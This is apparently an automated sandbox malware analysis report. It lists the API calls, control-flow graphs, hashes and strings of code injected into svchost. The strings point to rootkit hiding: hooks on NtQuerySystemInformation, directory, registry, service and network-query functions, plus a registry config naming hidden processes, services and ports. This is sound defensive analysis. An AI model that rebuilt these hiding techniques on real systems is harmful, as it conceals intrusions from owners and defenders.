                                                    • Part of subcall function 000002A661303B8C: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A66130362B), ref: 000002A661303BC8
                                                    • Part of subcall function 000002A661303B8C: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A66130362B), ref: 000002A661303BEA
                                                    • Part of subcall function 000002A661303B8C: GetCurrentProcess.KERNEL32(?,?,?,?,?,000002A66130362B), ref: 000002A661303C05
                                                    • Part of subcall function 000002A661303B8C: VirtualProtectEx.KERNEL32(?,?,?,?,?,000002A66130362B), ref: 000002A661303C26
                                                  • CreateThread.KERNELBASE ref: 000002A66130365B
                                                    • Part of subcall function 000002A661301D48: GetCurrentThread.KERNEL32 ref: 000002A661301D53
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                  • String ID:
                                                  • API String ID: 1683269324-0
                                                  • Opcode ID: cfb75781ef125e8798c35dece2b590244b14960149cb17afe32fff2217cf4a51
                                                  • Instruction ID: 659882ce894e0c288759e7ce0bf691af9d53aa99f943e821a563b1a6ffc36941
                                                  • Opcode Fuzzy Hash: cfb75781ef125e8798c35dece2b590244b14960149cb17afe32fff2217cf4a51
                                                  • Instruction Fuzzy Hash: 30115270F107044BF760E721E88DB6A22DCAB5BF96F9C4119950767695DF7CC04C8683
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000003.1748146841.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_3_2a6612d0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID:
                                                  • API String ID: 1029625771-0
                                                  • Opcode ID: 000990a0b745e2d7aebf751e9a901d84576f17a5eee71522b46ce82416c04370
                                                  • Instruction ID: 8d259ca6d1840243bbf459e1d442a662adbe14983783afa961c35c45f2036f16
                                                  • Opcode Fuzzy Hash: 000990a0b745e2d7aebf751e9a901d84576f17a5eee71522b46ce82416c04370
                                                  • Instruction Fuzzy Hash: A49100B2F0129087EB648F25D40CB69B39DFB55F98F598121DE4A07B88DF38D89AC711

                                                  Control-flow Graph

                                                  APIs
                                                    • Part of subcall function 000002A661301630: GetProcessHeap.KERNEL32 ref: 000002A66130163B
                                                    • Part of subcall function 000002A661301630: HeapAlloc.KERNEL32 ref: 000002A66130164A
                                                    • Part of subcall function 000002A661301630: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016BA
                                                    • Part of subcall function 000002A661301630: RegOpenKeyExW.ADVAPI32 ref: 000002A6613016E7
                                                    • Part of subcall function 000002A661301630: RegCloseKey.ADVAPI32 ref: 000002A661301701
                                                    • Part of subcall function 000002A661301630: RegOpenKeyExW.ADVAPI32 ref: 000002A661301721
                                                    • Part of subcall function 000002A661301630: RegCloseKey.ADVAPI32 ref: 000002A66130173C
                                                    • Part of subcall function 000002A661301630: RegOpenKeyExW.ADVAPI32 ref: 000002A66130175C
                                                    • Part of subcall function 000002A661301630: RegCloseKey.ADVAPI32 ref: 000002A661301777
                                                    • Part of subcall function 000002A661301630: RegOpenKeyExW.ADVAPI32 ref: 000002A661301797
                                                    • Part of subcall function 000002A661301630: RegCloseKey.ADVAPI32 ref: 000002A6613017B2
                                                    • Part of subcall function 000002A661301630: RegOpenKeyExW.ADVAPI32 ref: 000002A6613017D2
                                                  • SleepEx.KERNEL32 ref: 000002A661301AEB
                                                    • Part of subcall function 000002A661301630: RegCloseKey.ADVAPI32 ref: 000002A6613017ED
                                                    • Part of subcall function 000002A661301630: RegOpenKeyExW.ADVAPI32 ref: 000002A66130180D
                                                    • Part of subcall function 000002A661301630: RegCloseKey.ADVAPI32 ref: 000002A661301828
                                                    • Part of subcall function 000002A661301630: RegOpenKeyExW.ADVAPI32 ref: 000002A661301848
                                                    • Part of subcall function 000002A661301630: RegCloseKey.ADVAPI32 ref: 000002A661301863
                                                    • Part of subcall function 000002A661301630: RegOpenKeyExW.ADVAPI32 ref: 000002A661301883
                                                    • Part of subcall function 000002A661301630: RegCloseKey.ADVAPI32 ref: 000002A66130189E
                                                    • Part of subcall function 000002A661301630: RegCloseKey.ADVAPI32 ref: 000002A6613018A8
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CloseOpen$Heap$AllocProcessSleep
                                                  • String ID:
                                                  • API String ID: 948135145-0
                                                  • Opcode ID: 64fb92cc953f313ae368503f7b994b04d0db7b05d41c96cf66c0a3f5624dce5c
                                                  • Instruction ID: 6bb92a38ed41367f463a4f6583f8c5c2801da45df07b3da779ec9c32088b32ad
                                                  • Opcode Fuzzy Hash: 64fb92cc953f313ae368503f7b994b04d0db7b05d41c96cf66c0a3f5624dce5c
                                                  • Instruction Fuzzy Hash: 1631EF71F10A0193FB50AB22D94D35953FCAB86FDAF4C40219E0BA76D5EF18C85882D2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 59 2a661303c40-2a661303c4b 60 2a661303c4d-2a661303c60 StrCmpNIW 59->60 61 2a661303c65-2a661303c6c 59->61 60->61 62 2a661303c62 60->62 62->61
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0f2f8c85d97bfa1963699487ed075726bf70fce29d39662858d95c6d4cb610e3
                                                  • Instruction ID: f141fd4fd25ac7a8295883a17c638402f11136719f3a130f640817cb24d8f782
                                                  • Opcode Fuzzy Hash: 0f2f8c85d97bfa1963699487ed075726bf70fce29d39662858d95c6d4cb610e3
                                                  • Instruction Fuzzy Hash: AFD05E20B512098BFF24DFAA88CEA6033989B0AF05F9C4020D90253114DF1C898D8611

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 207 2a661302bc8-2a661302c41 209 2a661302c47-2a661302c4d 207->209 210 2a661302f5c-2a661302f7f 207->210 209->210 211 2a661302c53-2a661302c56 209->211 211->210 212 2a661302c5c-2a661302c5f 211->212 212->210 213 2a661302c65-2a661302c75 GetModuleHandleA 212->213 214 2a661302c77-2a661302c87 GetProcAddress 213->214 215 2a661302c89 213->215 216 2a661302c8c-2a661302caa 214->216 215->216 216->210 218 2a661302cb0-2a661302ccf StrCmpNIW 216->218 218->210 219 2a661302cd5-2a661302cd9 218->219 219->210 220 2a661302cdf-2a661302ce9 219->220 220->210 221 2a661302cef-2a661302cf6 220->221 221->210 222 2a661302cfc-2a661302d0f 221->222 223 2a661302d1f 222->223 224 2a661302d11-2a661302d1d 222->224 225 2a661302d22-2a661302d26 223->225 224->225 226 2a661302d36 225->226 227 2a661302d28-2a661302d34 225->227 228 2a661302d39-2a661302d43 226->228 227->228 229 2a661302e29-2a661302e2d 228->229 230 2a661302d49-2a661302d4c 228->230 233 2a661302f4e-2a661302f56 229->233 234 2a661302e33-2a661302e36 229->234 231 2a661302d5e-2a661302d68 230->231 232 2a661302d4e-2a661302d5b call 2a66130193c 230->232 236 2a661302d6a-2a661302d77 231->236 237 2a661302d9c-2a661302da6 231->237 232->231 233->210 233->222 238 2a661302e47-2a661302e51 234->238 239 2a661302e38-2a661302e44 call 2a66130193c 234->239 236->237 243 2a661302d79-2a661302d86 236->243 244 2a661302dd6-2a661302dd9 237->244 245 2a661302da8-2a661302db5 237->245 240 2a661302e81-2a661302e84 238->240 241 2a661302e53-2a661302e60 238->241 239->238 251 2a661302e86-2a661302e8f call 2a661301bd0 240->251 252 2a661302e91-2a661302e9e lstrlenW 240->252 241->240 250 2a661302e62-2a661302e6f 241->250 253 2a661302d89-2a661302d8f 243->253 248 2a661302de7-2a661302df4 lstrlenW 244->248 249 2a661302ddb-2a661302de5 call 2a661301bd0 244->249 245->244 254 2a661302db7-2a661302dc4 245->254 257 2a661302df6-2a661302e05 call 2a661301c08 248->257 258 2a661302e07-2a661302e19 call 2a661303c40 248->258 249->248 260 2a661302e1f-2a661302e24 249->260 256 2a661302e72-2a661302e78 250->256 251->252 266 2a661302ec6-2a661302ed1 251->266 262 2a661302ea0-2a661302eaf call 2a661301c08 252->262 263 2a661302eb1-2a661302ebb call 2a661303c40 252->263 253->260 261 2a661302d95-2a661302d9a 253->261 264 2a661302dc7-2a661302dcd 254->264 256->266 267 2a661302e7a-2a661302e7f 256->267 257->258 257->260 258->260 271 2a661302ebe-2a661302ec0 258->271 260->271 261->237 261->253 262->263 262->266 263->271 264->260 274 2a661302dcf-2a661302dd4 264->274 276 2a661302f48-2a661302f4c 266->276 277 2a661302ed3-2a661302ed7 266->277 267->240 267->256 271->233 271->266 274->244 274->264 276->233 281 2a661302ed9-2a661302edd 277->281 282 2a661302edf-2a661302ef9 call 2a661315470 277->282 281->282 283 2a661302efc-2a661302eff 281->283 282->283 286 2a661302f01-2a661302f1f call 2a661315470 283->286 287 2a661302f22-2a661302f25 283->287 286->287 287->276 289 2a661302f27-2a661302f45 call 2a661315470 287->289 289->276
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                  • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                  • API String ID: 2119608203-3850299575
                                                  • Opcode ID: 5fbd9173ce4d782f6a43f1b6ae1fcce4f28eac928785eaf1fb737f6660f8b0ea
                                                  • Instruction ID: 29f756d25aa53176d6133454c8ca329ba1d9212d22d95d3f366914d03d8a4014
                                                  • Opcode Fuzzy Hash: 5fbd9173ce4d782f6a43f1b6ae1fcce4f28eac928785eaf1fb737f6660f8b0ea
                                                  • Instruction Fuzzy Hash: 4BB17D22B1065087EB659F35D60C7A9A3E8F746F86F585016EE4E63B94DF38CD48C381
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 9234f04ebf3d0d18ada26ad48c251ddc084bcc865350783e627834a553364bb5
                                                  • Instruction ID: d1afdcc7fa68296096656a039373e5100c48faf27789308d529f3cb4d783c2c2
                                                  • Opcode Fuzzy Hash: 9234f04ebf3d0d18ada26ad48c251ddc084bcc865350783e627834a553364bb5
                                                  • Instruction Fuzzy Hash: D7313E72B05B808AEB648F60E8593DD73A8F789B44F48442ADA4E57B94DF38C54DC711
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 1239891234-0
                                                  • Opcode ID: 25459dfd405c3fd6abe62832c5e49632febe87f8ccdadd93aea5d47d5ebeda6d
                                                  • Instruction ID: fb74ead1db9c2f174411088644d4816b6a4dc15eb5f072602db45cebaafd3bb2
                                                  • Opcode Fuzzy Hash: 25459dfd405c3fd6abe62832c5e49632febe87f8ccdadd93aea5d47d5ebeda6d
                                                  • Instruction Fuzzy Hash: F1316032714B8086EB60CF25E84939E73A8F78AB54F580525EA8E53B54DF3CC15ACB41

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                  • String ID: SOFTWARE\x4config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                  • API String ID: 2135414181-1036178600
                                                  • Opcode ID: 00666697048e66f47c213fec616e4e8a9e118adeb47c65b252f020183c468c1e
                                                  • Instruction ID: e37785f2ac70fd892558cc9cb2aca7979c445bc321b9e4c2742e55636873d59c
                                                  • Opcode Fuzzy Hash: 00666697048e66f47c213fec616e4e8a9e118adeb47c65b252f020183c468c1e
                                                  • Instruction Fuzzy Hash: 37711836B10B1087EB119F66E88D69933B8FB86F9DF081121DA4E67B68DF38C548C341

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentThread.KERNEL32 ref: 000002A661301D53
                                                    • Part of subcall function 000002A66130208C: GetModuleHandleA.KERNEL32(?,?,?,000002A661301D85), ref: 000002A6613020A4
                                                    • Part of subcall function 000002A66130208C: GetProcAddress.KERNEL32(?,?,?,000002A661301D85), ref: 000002A6613020B5
                                                    • Part of subcall function 000002A661305F20: GetCurrentThreadId.KERNEL32 ref: 000002A661305F5B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread$AddressHandleModuleProc
                                                  • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$ntdll.dll$pdh.dll$sechost.dll
                                                  • API String ID: 4175298099-1819131285
                                                  • Opcode ID: ec902621774e6c93ddf96b1cef49485a110a34d9b18634e59d3ce01917ac58d9
                                                  • Instruction ID: 3ac778f2887c2e28f85f25b529d4aa60e6c0bba4b6ef8c96302975b66f48a21d
                                                  • Opcode Fuzzy Hash: ec902621774e6c93ddf96b1cef49485a110a34d9b18634e59d3ce01917ac58d9
                                                  • Instruction Fuzzy Hash: 43418260B00A4AE3FA05EB65E94E7D57369A746B45F8C4423980B33561DF7D824DC3D3

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                  • String ID: d
                                                  • API String ID: 2005889112-2564639436
                                                  • Opcode ID: e2ed30d8db31d81b4c0daa00d2e475a39dc02a101f7e26d9b862c19419363001
                                                  • Instruction ID: 43f9a4b0b76dd1afec201bc2c794f33a980789856b5dc1eca0a0eecf0a8d6aa6
                                                  • Opcode Fuzzy Hash: e2ed30d8db31d81b4c0daa00d2e475a39dc02a101f7e26d9b862c19419363001
                                                  • Instruction Fuzzy Hash: 4A510672A14B8487EB54CF62E44D39AB7A6F78AF99F084124DE4A27768DF3CC0498741
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000003.1748146841.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_3_2a6612d0000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                  • String ID: `eh vector constructor iterator'$`virtual displacement map'$or iterator'$r iterator'
                                                  • API String ID: 190073905-2094522767
                                                  • Opcode ID: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction ID: fdff1fcc2762cb7d36e35c49df5d07802289497c43f7006be2b3793f5a384552
                                                  • Opcode Fuzzy Hash: 12e6944f9e020bf7bba539df7bc83e8ef27753177fa0d3ccda2e8152a8c18693
                                                  • Instruction Fuzzy Hash: 4081BE60F006814BF654AB65E88D39932ACAF97F84F9C4515EA49437D6EF3CC8CD8702

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 160 2a66130d778-2a66130d79a GetLastError 161 2a66130d7b9-2a66130d7c4 FlsSetValue 160->161 162 2a66130d79c-2a66130d7a7 FlsGetValue 160->162 165 2a66130d7c6-2a66130d7c9 161->165 166 2a66130d7cb-2a66130d7d0 161->166 163 2a66130d7a9-2a66130d7b1 162->163 164 2a66130d7b3 162->164 167 2a66130d825-2a66130d830 SetLastError 163->167 164->161 165->167 168 2a66130d7d5 call 2a66130e01c 166->168 169 2a66130d832-2a66130d844 167->169 170 2a66130d845-2a66130d85b call 2a66130d098 167->170 171 2a66130d7da-2a66130d7e6 168->171 184 2a66130d878-2a66130d883 FlsSetValue 170->184 185 2a66130d85d-2a66130d868 FlsGetValue 170->185 173 2a66130d7f8-2a66130d802 FlsSetValue 171->173 174 2a66130d7e8-2a66130d7ef FlsSetValue 171->174 175 2a66130d816-2a66130d820 call 2a66130d4e4 call 2a66130e094 173->175 176 2a66130d804-2a66130d814 FlsSetValue 173->176 178 2a66130d7f1-2a66130d7f6 call 2a66130e094 174->178 175->167 176->178 178->165 186 2a66130d8e8-2a66130d8ef call 2a66130d098 184->186 187 2a66130d885-2a66130d88a 184->187 189 2a66130d86a-2a66130d86e 185->189 190 2a66130d872 185->190 192 2a66130d88f call 2a66130e01c 187->192 189->186 193 2a66130d870 189->193 190->184 196 2a66130d894-2a66130d8a0 192->196 194 2a66130d8df-2a66130d8e7 193->194 197 2a66130d8b2-2a66130d8bc FlsSetValue 196->197 198 2a66130d8a2-2a66130d8a9 FlsSetValue 196->198 200 2a66130d8be-2a66130d8ce FlsSetValue 197->200 201 2a66130d8d0-2a66130d8da call 2a66130d4e4 call 2a66130e094 197->201 199 2a66130d8ab-2a66130d8b0 call 2a66130e094 198->199 199->186 200->199 201->194
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D787
                                                  • FlsGetValue.KERNEL32(?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D79C
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D7BD
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D7EA
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D7FB
                                                  • FlsSetValue.KERNEL32(?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D80C
                                                  • SetLastError.KERNEL32(?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D827
                                                  • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D85D
                                                  • FlsSetValue.KERNEL32(?,?,00000001,000002A66130F61C,?,?,?,?,000002A66130C8EF,?,?,?,?,?,000002A661307EA0), ref: 000002A66130D87C
                                                    • Part of subcall function 000002A66130E01C: HeapAlloc.KERNEL32(?,?,00000000,000002A66130D952,?,?,?,000002A66130E005,?,?,?,?,000002A66130E0C8), ref: 000002A66130E071
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D8A4
                                                    • Part of subcall function 000002A66130E094: HeapFree.KERNEL32(?,?,?,?,?,?,?,000002A6613063FA), ref: 000002A66130E0AA
                                                    • Part of subcall function 000002A66130E094: GetLastError.KERNEL32(?,?,?,?,?,?,?,000002A6613063FA), ref: 000002A66130E0B4
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D8B5
                                                  • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002A6613113BB,?,?,?,000002A661310DAC,?,?,?,000002A66130D19F), ref: 000002A66130D8C6
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast$Heap$AllocFree
                                                  • String ID:
                                                  • API String ID: 570795689-0
                                                  • Opcode ID: 61107eddd0a8e6bd0c478185a7cd5dc7639332fade6589c761d9e8646912cfb4
                                                  • Instruction ID: 4eb48f3e97dbd1de39e836f777a08e4f2dfb62d467093b7a6f21dfc23640e783
                                                  • Opcode Fuzzy Hash: 61107eddd0a8e6bd0c478185a7cd5dc7639332fade6589c761d9e8646912cfb4
                                                  • Instruction Fuzzy Hash: 17414C10F0124043F958A736595D36922DE9B47FB2F1C4728A93F2B6C2DF2C948D82C3

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.2981142328.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                  • Associated: 00000008.00000002.2980218355.000002A661300000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2982345450.000002A661317000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2983411896.000002A661322000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2984275183.000002A661324000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000008.00000002.2985245636.000002A66132A000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_2a661300000_svchost.jbxd
                                                  Similarity
                                                  • API ID: Heap$CounterInfoProcess$AllocFree
                                                  • String ID: \GPU Engine(*)\Running Time
                                                  • API String ID: 1943346504-1805530042
                                                  • Opcode ID: 1886a53ecf893c2db2e77962806af446ee47527b1e7daf5f74d3f3510bc18bf0
                                                  • Instruction ID: ef53d4ff2fa003dce5073fd67590cb99f0f84246c437b3a49e9d16e7761375e0
                                                  • Opcode Fuzzy Hash: 1886a53ecf893c2db2e77962806af446ee47527b1e7daf5f74d3f3510bc18bf0
                                                  • Instruction Fuzzy Hash: 43317122F04A4187E710DF22E80C79AB3A9F74AF95F4C4625DE4B63624DF3CC4598781

                                                  Control-flow Graph

                                                  APIs
                                                  Strings
